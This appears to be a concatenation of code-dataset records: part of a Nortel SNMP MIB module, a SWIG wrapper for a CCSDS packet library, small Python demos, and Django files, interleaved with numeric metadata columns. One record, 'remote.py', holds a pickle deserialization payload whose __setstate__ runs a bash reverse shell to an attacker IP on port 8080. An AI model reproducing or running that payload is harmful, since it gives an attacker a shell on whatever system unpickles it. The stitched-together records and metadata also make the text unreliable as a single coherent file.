4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setStatus('mandatory') mscColSpRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRecordsRx.setStatus('mandatory') mscColSpRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setStatus('mandatory') mscColAg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3)) mscColAgRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1), ) if mibBuilder.loadTexts: mscColAgRowStatusTable.setStatus('mandatory') mscColAgRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgRowStatusEntry.setStatus('mandatory') mscColAgRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 1), RowStatus()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRowStatus.setStatus('mandatory') mscColAgComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgComponentName.setStatus('mandatory') mscColAgStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgStorageType.setStatus('mandatory') mscColAgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))) if mibBuilder.loadTexts: mscColAgIndex.setStatus('mandatory') mscColAgStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10), ) if mibBuilder.loadTexts: mscColAgStatsTable.setStatus('mandatory') mscColAgStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgStatsEntry.setStatus('mandatory') mscColAgCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setStatus('mandatory') mscColAgRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsRx.setStatus('mandatory') mscColAgRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setStatus('mandatory') mscColAgAgentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11), ) if mibBuilder.loadTexts: mscColAgAgentStatsTable.setStatus('mandatory') mscColAgAgentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setStatus('mandatory') mscColAgRecordsNotGenerated = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1, 1), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setStatus('mandatory') dataCollectionGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1)) dataCollectionGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1)) dataCollectionGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3)) dataCollectionGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3, 2)) dataCollectionCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3)) dataCollectionCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1)) dataCollectionCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3)) dataCollectionCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3, 2)) mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-DataCollectionMIB", mscColProvEntry=mscColProvEntry, mscColSpUsageState=mscColSpUsageState, mscColAgRowStatus=mscColAgRowStatus, mscColIndex=mscColIndex, mscColSpProvEntry=mscColSpProvEntry, mscColSpStandbyStatus=mscColSpStandbyStatus, mscColAgComponentName=mscColAgComponentName, mscColCurrentQueueSize=mscColCurrentQueueSize, mscColAgCurrentQueueSize=mscColAgCurrentQueueSize, mscColStatsEntry=mscColStatsEntry, mscColStatsTable=mscColStatsTable, mscColSpSpoolingFileName=mscColSpSpoolingFileName, mscColAgStorageType=mscColAgStorageType, mscColAgRecordsRx=mscColAgRecordsRx, mscColPeakTable=mscColPeakTable, mscColSpRecordsDiscarded=mscColSpRecordsDiscarded, mscColSpControlStatus=mscColSpControlStatus, dataCollectionGroupCA02=dataCollectionGroupCA02, dataCollectionCapabilitiesCA02A=dataCollectionCapabilitiesCA02A, mscColAgAgentStatsEntry=mscColAgAgentStatsEntry, mscColSpOperTable=mscColSpOperTable, mscColSpOperationalState=mscColSpOperationalState, mscColAgRowStatusTable=mscColAgRowStatusTable, dataCollectionMIB=dataCollectionMIB, mscColAgRowStatusEntry=mscColAgRowStatusEntry, mscColAgRecordsDiscarded=mscColAgRecordsDiscarded, mscColSpAdminState=mscColSpAdminState, mscColAgStatsTable=mscColAgStatsTable, mscColSpAlarmStatus=mscColSpAlarmStatus, mscColTimesValue=mscColTimesValue, mscColAgAgentStatsTable=mscColAgAgentStatsTable, mscColTimesRowStatus=mscColTimesRowStatus, mscColTimesTable=mscColTimesTable, mscColAgIndex=mscColAgIndex, mscColLastEntry=mscColLastEntry, mscColPeakValue=mscColPeakValue, dataCollectionGroupCA=dataCollectionGroupCA, mscColSpSpooling=mscColSpSpooling, dataCollectionCapabilitiesCA02=dataCollectionCapabilitiesCA02, mscColSpMaximumNumberOfFiles=mscColSpMaximumNumberOfFiles, mscColSpProvTable=mscColSpProvTable, mscColSpAvailabilityStatus=mscColSpAvailabilityStatus, mscColSpCurrentQueueSize=mscColSpCurrentQueueSize, mscColSpStorageType=mscColSpStorageType, dataCollectionGroupCA02A=dataCollectionGroupCA02A, mscColAg=mscColAg, mscColSpUnknownStatus=mscColSpUnknownStatus, mscColAgStatsEntry=mscColAgStatsEntry, dataCollectionGroup=dataCollectionGroup, mscCol=mscCol, mscColSpOperEntry=mscColSpOperEntry, mscColSpRowStatusEntry=mscColSpRowStatusEntry, mscColSpStateEntry=mscColSpStateEntry, mscColAgRecordsNotGenerated=mscColAgRecordsNotGenerated, mscColSpStateTable=mscColSpStateTable, mscColSpRecordsRx=mscColSpRecordsRx, mscColSpRowStatusTable=mscColSpRowStatusTable, mscColSpComponentName=mscColSpComponentName, mscColSpProceduralStatus=mscColSpProceduralStatus, mscColRowStatusTable=mscColRowStatusTable, mscColPeakEntry=mscColPeakEntry, mscColLastValue=mscColLastValue, mscColRowStatusEntry=mscColRowStatusEntry, mscColAgentQueueSize=mscColAgentQueueSize, mscColLastTable=mscColLastTable, mscColRowStatus=mscColRowStatus, mscColTimesEntry=mscColTimesEntry, mscColSp=mscColSp, mscColPeakRowStatus=mscColPeakRowStatus, mscColStorageType=mscColStorageType, dataCollectionCapabilitiesCA=dataCollectionCapabilitiesCA, mscColSpRowStatus=mscColSpRowStatus, mscColComponentName=mscColComponentName, mscColSpIndex=mscColSpIndex, mscColRecordsRx=mscColRecordsRx, mscColSpStatsTable=mscColSpStatsTable, mscColProvTable=mscColProvTable, mscColSpStatsEntry=mscColSpStatsEntry, dataCollectionCapabilities=dataCollectionCapabilities, mscColRecordsDiscarded=mscColRecordsDiscarded)
134.987952
3,370
0.763433
2,525
22,408
6.77505
0.092673
0.010288
0.014029
0.018706
0.460864
0.404571
0.392939
0.384989
0.353189
0.32817
0
0.087376
0.084747
22,408
165
3,371
135.806061
0.746745
0.017226
0
0
0
0
0.151183
0.064416
0
0
0
0
0
1
0
false
0.113924
0.056962
0
0.056962
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
f76361fcf068ba8c5aaf77e930edcf6ab7b3c971
8,423
py
Python
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
1
2021-06-10T13:14:27.000Z
2021-06-10T13:14:27.000Z
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
null
null
null
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
null
null
null
# This file was automatically generated by SWIG (http://www.swig.org). # Version 4.0.2 # # Do not make changes to this file unless you know what you are doing--modify # the SWIG interface file instead. from sys import version_info as _swig_python_version_info if _swig_python_version_info < (2, 7, 0): raise RuntimeError("Python 2.7 or later required") # Import the low-level C/C++ module if __package__ or "." in __name__: from . import _ccsdslib else: import _ccsdslib try: import builtins as __builtin__ except ImportError: import __builtin__ def _swig_repr(self): try: strthis = "proxy of " + self.this.__repr__() except __builtin__.Exception: strthis = "" return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,) def _swig_setattr_nondynamic_instance_variable(set): def set_instance_attr(self, name, value): if name == "thisown": self.this.own(value) elif name == "this": set(self, name, value) elif hasattr(self, name) and isinstance(getattr(type(self), name), property): set(self, name, value) else: raise AttributeError("You cannot add instance attributes to %s" % self) return set_instance_attr def _swig_setattr_nondynamic_class_variable(set): def set_class_attr(cls, name, value): if hasattr(cls, name) and not isinstance(getattr(cls, name), property): set(cls, name, value) else: raise AttributeError("You cannot add class attributes to %s" % cls) return set_class_attr def _swig_add_metaclass(metaclass): """Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass""" def wrapper(cls): return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy()) return wrapper class _SwigNonDynamicMeta(type): """Meta class to enforce nondynamic attributes (no new attributes) for a class""" __setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__) class SwigPyIterator(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr __swig_destroy__ = _ccsdslib.delete_SwigPyIterator def value(self): return _ccsdslib.SwigPyIterator_value(self) def incr(self, n=1): return _ccsdslib.SwigPyIterator_incr(self, n) def decr(self, n=1): return _ccsdslib.SwigPyIterator_decr(self, n) def distance(self, x): return _ccsdslib.SwigPyIterator_distance(self, x) def equal(self, x): return _ccsdslib.SwigPyIterator_equal(self, x) def copy(self): return _ccsdslib.SwigPyIterator_copy(self) def next(self): return _ccsdslib.SwigPyIterator_next(self) def __next__(self): return _ccsdslib.SwigPyIterator___next__(self) def previous(self): return _ccsdslib.SwigPyIterator_previous(self) def advance(self, n): return _ccsdslib.SwigPyIterator_advance(self, n) def __eq__(self, x): return _ccsdslib.SwigPyIterator___eq__(self, x) def __ne__(self, x): return _ccsdslib.SwigPyIterator___ne__(self, x) def __iadd__(self, n): return _ccsdslib.SwigPyIterator___iadd__(self, n) def __isub__(self, n): return _ccsdslib.SwigPyIterator___isub__(self, n) def __add__(self, n): return _ccsdslib.SwigPyIterator___add__(self, n) def __sub__(self, *args): return _ccsdslib.SwigPyIterator___sub__(self, *args) def __iter__(self): return self # Register SwigPyIterator in _ccsdslib: _ccsdslib.SwigPyIterator_swigregister(SwigPyIterator) class CCSDSprimaryHeader(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr packet_version = property(_ccsdslib.CCSDSprimaryHeader_packet_version_get, _ccsdslib.CCSDSprimaryHeader_packet_version_set) packet_type = property(_ccsdslib.CCSDSprimaryHeader_packet_type_get, _ccsdslib.CCSDSprimaryHeader_packet_type_set) sec_hdr_flag = property(_ccsdslib.CCSDSprimaryHeader_sec_hdr_flag_get, _ccsdslib.CCSDSprimaryHeader_sec_hdr_flag_set) apid = property(_ccsdslib.CCSDSprimaryHeader_apid_get, _ccsdslib.CCSDSprimaryHeader_apid_set) seq_flags = property(_ccsdslib.CCSDSprimaryHeader_seq_flags_get, _ccsdslib.CCSDSprimaryHeader_seq_flags_set) packet_count_or_name = property(_ccsdslib.CCSDSprimaryHeader_packet_count_or_name_get, _ccsdslib.CCSDSprimaryHeader_packet_count_or_name_set) packet_length = property(_ccsdslib.CCSDSprimaryHeader_packet_length_get, _ccsdslib.CCSDSprimaryHeader_packet_length_set) def __init__(self): _ccsdslib.CCSDSprimaryHeader_swiginit(self, _ccsdslib.new_CCSDSprimaryHeader()) __swig_destroy__ = _ccsdslib.delete_CCSDSprimaryHeader # Register CCSDSprimaryHeader in _ccsdslib: _ccsdslib.CCSDSprimaryHeader_swigregister(CCSDSprimaryHeader) class CCSDSsecondaryHeader(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr seconds = property(_ccsdslib.CCSDSsecondaryHeader_seconds_get, _ccsdslib.CCSDSsecondaryHeader_seconds_set) subseconds = property(_ccsdslib.CCSDSsecondaryHeader_subseconds_get, _ccsdslib.CCSDSsecondaryHeader_subseconds_set) def __init__(self): _ccsdslib.CCSDSsecondaryHeader_swiginit(self, _ccsdslib.new_CCSDSsecondaryHeader()) __swig_destroy__ = _ccsdslib.delete_CCSDSsecondaryHeader # Register CCSDSsecondaryHeader in _ccsdslib: _ccsdslib.CCSDSsecondaryHeader_swigregister(CCSDSsecondaryHeader) class ParamNameType(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr name = property(_ccsdslib.ParamNameType_name_get, _ccsdslib.ParamNameType_name_set) type = property(_ccsdslib.ParamNameType_type_get, _ccsdslib.ParamNameType_type_set) def __init__(self): _ccsdslib.ParamNameType_swiginit(self, _ccsdslib.new_ParamNameType()) __swig_destroy__ = _ccsdslib.delete_ParamNameType # Register ParamNameType in _ccsdslib: _ccsdslib.ParamNameType_swigregister(ParamNameType) class CCSDS(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr def __init__(self): _ccsdslib.CCSDS_swiginit(self, _ccsdslib.new_CCSDS()) __swig_destroy__ = _ccsdslib.delete_CCSDS def newPacketField(self, *args): return _ccsdslib.CCSDS_newPacketField(self, *args) def xmlPacketDesc(self, file_path, root_node): return _ccsdslib.CCSDS_xmlPacketDesc(self, file_path, root_node) def xtceAPID(self): return _ccsdslib.CCSDS_xtceAPID(self) def xtceSecHdrFlag(self): return _ccsdslib.CCSDS_xtceSecHdrFlag(self) def xtceVersion(self): return _ccsdslib.CCSDS_xtceVersion(self) def xtceType(self): return _ccsdslib.CCSDS_xtceType(self) def loadPacketFile(self, file_path): return _ccsdslib.CCSDS_loadPacketFile(self, file_path) def decodePacketBytes(self, file_bytes): return _ccsdslib.CCSDS_decodePacketBytes(self, file_bytes) def primaryHeader(self): return _ccsdslib.CCSDS_primaryHeader(self) def secondaryHeader(self): return _ccsdslib.CCSDS_secondaryHeader(self) def loadFrameFile(self, file_path): return _ccsdslib.CCSDS_loadFrameFile(self, file_path) def decodeFrameBytes(self, file_bytes): return _ccsdslib.CCSDS_decodeFrameBytes(self, file_bytes) def packetFields(self): return _ccsdslib.CCSDS_packetFields(self) def encodePacketBytes(self, *args): return _ccsdslib.CCSDS_encodePacketBytes(self, *args) def encodeCommand(self, command_header, command): return _ccsdslib.CCSDS_encodeCommand(self, command_header, command) # Register CCSDS in _ccsdslib: _ccsdslib.CCSDS_swigregister(CCSDS)
37.105727
146
0.721952
963
8,423
5.851506
0.182762
0.077019
0.079503
0.028571
0.274357
0.168234
0.106832
0.106832
0.091216
0.091216
0
0.001474
0.194586
8,423
226
147
37.269912
0.829157
0.071352
0
0.139073
1
0
0.036318
0
0
0
0
0
0
1
0.291391
false
0
0.039735
0.218543
0.794702
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
f7682b4c63a997f5f74b79056666b93d448ba6b7
100
py
Python
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
9
2020-04-23T05:24:19.000Z
2022-02-17T16:37:51.000Z
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
5
2020-10-01T05:08:37.000Z
2020-10-12T03:18:10.000Z
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
9
2020-04-28T14:06:41.000Z
2021-10-19T18:32:28.000Z
for i in range(1,101) : if(i % 2 != 0): pass else: print(i,"is even number")
20
33
0.46
17
100
2.705882
0.882353
0
0
0
0
0
0
0
0
0
0
0.096774
0.38
100
5
33
20
0.645161
0
0
0
0
0
0.138614
0
0
0
0
0
0
1
0
false
0.2
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
f776538d6282674313ee6dc35b608e379b9e103d
462
py
Python
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
import pickle import os class foobar: def __init__(self): pass def __getstate__(self): return self.__dict__ def __setstate__(self, state): # The attack is from 192.168.1.10 # The attacker is listening on port 8080 os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"') my_foobar = foobar() my_pickle = pickle.dumps(my_foobar) my_unpickle = pickle.loads(my_pickle)
22
83
0.621212
66
462
4.030303
0.606061
0.052632
0
0
0
0
0
0
0
0
0
0.08284
0.268398
462
20
84
23.1
0.704142
0.151515
0
0
0
0.083333
0.165312
0.067751
0
0
0
0
0
1
0.25
false
0.083333
0.166667
0.083333
0.583333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
3
f78d4902a0d45c5cc02a1d98f8f1c4923725a7d8
307
py
Python
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
1
2019-06-13T03:07:15.000Z
2019-06-13T03:07:15.000Z
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
8
2019-07-04T16:19:06.000Z
2019-07-12T17:37:51.000Z
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
null
null
null
from django.db import models class GameManual(models.Model): year = models.CharField(max_length=4) name = models.CharField(max_length=140,null=True) file = models.FileField(upload_to='files/') image = models.ImageField(upload_to='images/') def __str__(self): return self.year;
27.909091
53
0.70684
41
307
5.097561
0.707317
0.143541
0.172249
0.229665
0
0
0
0
0
0
0
0.015686
0.169381
307
10
54
30.7
0.803922
0
0
0
0
0
0.042345
0
0
0
0
0
0
1
0.125
false
0
0.125
0.125
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
3
f7a06fe51e0efd77d944743626803b8bcb3f2920
356
py
Python
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
14
2015-10-03T07:34:28.000Z
2021-09-20T07:10:29.000Z
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
23
2019-10-25T08:47:23.000Z
2022-01-30T02:00:45.000Z
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
7
2016-10-04T08:10:36.000Z
2021-09-20T07:10:33.000Z
# Generated by Django 2.2.13 on 2021-04-05 01:30 from django.db import migrations from django.conf import settings def forwards(apps, schema_editor): pass class Migration(migrations.Migration): dependencies = [ ('subscriptions', '0018_add_itunes_receipt_field'), ] operations = [ migrations.RunPython(forwards) ]
17.8
59
0.69382
43
356
5.627907
0.790698
0.082645
0
0
0
0
0
0
0
0
0
0.071429
0.213483
356
19
60
18.736842
0.792857
0.129213
0
0
1
0
0.136364
0.094156
0
0
0
0
0
1
0.090909
false
0.090909
0.181818
0
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
3
e39124e26b71393012cab5f6f42ca8c04d6facf4
74
py
Python
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
[ "MIT" ]
null
null
null
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
[ "MIT" ]
null
null
null
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
[ "MIT" ]
1
2020-12-13T07:16:28.000Z
2020-12-13T07:16:28.000Z
from chalicelib.model.models import * EmployeeDetails = EmployeeDetails()
24.666667
37
0.824324
7
74
8.714286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.094595
74
3
38
24.666667
0.910448
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
e3931d83e8b52d54c8471cd83a5c8800c1cb4258
430
py
Python
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
keyboards/default/product_menus.py
Asadbek07/e-commerce-bot
df6c1bb625becf95bf53f4cece12752dca9f7f67
[ "Unlicense", "MIT" ]
null
null
null
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton products_menu_uz = ReplyKeyboardMarkup( keyboard = [ [ KeyboardButton(text="📥Savat"), KeyboardButton(text="🚖Buyrtuma berish") ], ], row_width=2, resize_keyboard=True ) products_menu_eng = ReplyKeyboardMarkup( keyboard = [ [ KeyboardButton(text="📥Basket"), KeyboardButton(text="🚖Place an order") ], ], row_width=2, resize_keyboard=True )
13.870968
61
0.718605
47
430
6.489362
0.553191
0.236066
0.268852
0.295082
0.478689
0.177049
0
0
0
0
0
0.00551
0.155814
430
30
62
14.333333
0.823691
0
0
0.47619
0
0
0.102804
0
0
0
0
0
0
1
0
false
0
0.047619
0
0.047619
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
e3974f70139e1e89415433a3216c1d8c9eb5ca2b
52
py
Python
src/openrxn/__init__.py
alexrd/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
5
2020-01-29T19:04:44.000Z
2021-01-22T15:55:27.000Z
src/openrxn/__init__.py
ADicksonLab/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
null
null
null
src/openrxn/__init__.py
ADicksonLab/OpenRXN
f61817b2e9a7f83451817c4350e88faaa1de2914
[ "MIT" ]
null
null
null
from pint import UnitRegistry unit = UnitRegistry()
17.333333
29
0.807692
6
52
7
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.134615
52
2
30
26
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3